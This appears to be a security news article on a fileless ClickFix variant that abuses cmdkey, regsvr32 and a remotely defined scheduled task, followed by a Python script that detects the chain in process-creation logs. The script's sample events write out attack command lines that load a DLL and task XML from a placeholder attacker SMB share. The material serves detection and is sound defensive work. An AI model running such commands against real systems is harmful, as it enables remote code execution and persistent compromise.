Security researchers have identified a more advanced version of the ClickFix attack that significantly raises the bar for stealth and persistence. Unlike earlier campaigns that relied heavily on PowerShell, this new variant leverages built-in Windows utilities to execute malicious activity without dropping files on disk, making detection far more difficult.

According to findings published by CyberProof’s Threat Research Team, the updated ClickFix technique replaces PowerShell with native tools such as cmdkey and regsvr32. As a result, attackers can blend their actions into normal system behavior, effectively bypassing many traditional security controls.

To begin with, the attack still relies on social engineering, a core component of previous ClickFix campaigns. However, instead of using obvious malicious scripts, attackers now lure victims through fake CAPTCHA pages designed to mimic legitimate verification systems like Cloudflare. Once users trust the page, they are instructed to open the Windows Run dialog, paste a pre-loaded command, and execute it.

From there, the attack chain unfolds quickly. First, the command uses cmdkey to store credentials for a remote server. Next, regsvr32 silently loads a malicious DLL from an attacker-controlled SMB share. Because both tools are legitimate Windows components, commonly referred to as Living off the Land Binaries (LOLBins), their activity often appears harmless to endpoint detection systems.

Moreover, the attack establishes persistence in a particularly stealthy way. Once the DLL executes, it triggers a hidden process that creates a scheduled task named “RunNotepadNow.” Instead of storing task details locally, the system retrieves them from a remote XML file. Consequently, attackers can modify the second-stage payload at any time without needing to reinfect the system, ensuring long-term control with minimal footprint.

What makes this campaign especially concerning is its simplicity and effectiveness. A single pasted command is enough to initiate a multi-stage infection. Furthermore, because the entire process uses trusted system utilities, organizations relying solely on behavioral or file-based detection may fail to identify the threat.

In addition, this shift highlights a growing trend in cyberattacks: the abuse of legitimate tools to evade detection. By avoiding custom malware and instead using native binaries, attackers reduce their visibility while maintaining full control over compromised systems.

To mitigate the risk, security teams should closely monitor unusual usage of tools like cmdkey and regsvr32, particularly when they interact with external IP addresses or remote file paths. They should also implement stricter controls on outbound SMB traffic and review Task Scheduler activity for suspicious behavior. Equally important, organizations must invest in user awareness training to help employees recognize deceptive tactics such as fake CAPTCHA prompts.
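As an added example of the monitoring this paragraph recommends (not code from the original article or from CyberProof), the following Python script runs simple rules over process-creation events of the kind Sysmon Event ID 1 or Windows Security 4688 produce. It flags cmdkey storing credentials for an external host, regsvr32 loading from a UNC or URL path, and schtasks importing a task definition from a remote XML file, then correlates cmdkey staging followed by a remote regsvr32 load on the same host into a single chain finding. The events, hostnames, paths, the 203.0.113.0/24 addresses and the internal DNS suffix are all constructed placeholders, not indicators from the campaign.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample events (Sysmon Event ID 1 / Security 4688 style). Hosts, paths and
# addresses are placeholders chosen for this example, not indicators from the campaign.
SAMPLE_EVENTS = [
    {"ts": 100, "host": "WS01", "image": r"C:\Windows\System32\cmdkey.exe",
     "cmdline": r"cmdkey /add:203.0.113.10 /user:<redacted> /pass:<redacted>"},
    {"ts": 102, "host": "WS01", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s \\203.0.113.10\share\payload.dll"},
    {"ts": 130, "host": "WS01", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /create /tn RunNotepadNow /xml \\203.0.113.10\share\task.xml"},
    {"ts": 500, "host": "WS02", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\lib.dll"},          # benign local registration
    {"ts": 600, "host": "WS03", "image": r"C:\Windows\System32\cmdkey.exe",
     "cmdline": r"cmdkey /add:fs01.corp.example /user:<redacted> /pass:<redacted>"},  # internal server
]

# Assumption: the organisation's internal DNS suffixes and address ranges. RFC 1918 plus
# loopback/link-local are listed explicitly instead of using ip.is_private, because that
# property also treats documentation ranges such as 203.0.113.0/24 as private.
INTERNAL_SUFFIXES = (".corp.example",)
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]

UNC_HOST_RE = re.compile(r"\\\\([^\\\s]+)\\")       # \\host\share...
URL_HOST_RE = re.compile(r"https?://([^/\s]+)", re.I)
CMDKEY_ADD_RE = re.compile(r"/add:(\S+)", re.I)


def remote_hosts(cmdline):
    """Every UNC or URL host referenced by a command line."""
    return UNC_HOST_RE.findall(cmdline) + URL_HOST_RE.findall(cmdline)


def is_external(host):
    """True when host is an IP outside the internal ranges or a name outside the internal suffixes."""
    try:
        ip = ipaddress.ip_address(host)
        return not any(ip in net for net in INTERNAL_NETS)
    except ValueError:
        return not host.lower().endswith(INTERNAL_SUFFIXES)


def classify(ev):
    """Map one process-creation event to a finding name, or None when nothing matches."""
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    cmd = ev["cmdline"]
    if image == "cmdkey.exe":
        m = CMDKEY_ADD_RE.search(cmd)
        if m and is_external(m.group(1)):
            return "cmdkey_external_credential"
    elif image == "regsvr32.exe" and remote_hosts(cmd):
        return "regsvr32_remote_load"
    elif image == "schtasks.exe" and "/xml" in cmd.lower() and remote_hosts(cmd):
        return "schtasks_remote_xml"
    return None


def detect(events, window=300):
    """Return (host, ts, finding) tuples. A 'clickfix_chain' finding is emitted when a
    remote regsvr32 load follows cmdkey credential staging on the same host within
    `window` seconds, which is the sequence the article describes."""
    findings = []
    staged = defaultdict(list)   # host -> timestamps of cmdkey_external_credential
    for ev in sorted(events, key=lambda e: e["ts"]):
        name = classify(ev)
        if not name:
            continue
        findings.append((ev["host"], ev["ts"], name))
        if name == "cmdkey_external_credential":
            staged[ev["host"]].append(ev["ts"])
        elif name == "regsvr32_remote_load" and any(ev["ts"] - t <= window for t in staged[ev["host"]]):
            findings.append((ev["host"], ev["ts"], "clickfix_chain"))
    return findings


if __name__ == "__main__":
    for host, ts, name in detect(SAMPLE_EVENTS):
        print(f"{host} t={ts} {name}")
```

In this run only WS01 produces findings: the local vendor DLL registration on WS02 and the credential for an internal file server on WS03 are left alone, which is the point of keeping an allowlist of internal ranges and suffixes rather than alerting on every cmdkey or regsvr32 launch. In a real deployment the same rules would be expressed in the SIEM's query language and the scheduled-task rule would additionally be checked against Task Scheduler operational events.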

Ultimately, this new ClickFix variant underscores how attackers continue to evolve their methods, forcing defenders to rethink traditional detection strategies and adopt more proactive, behavior-based security measures.
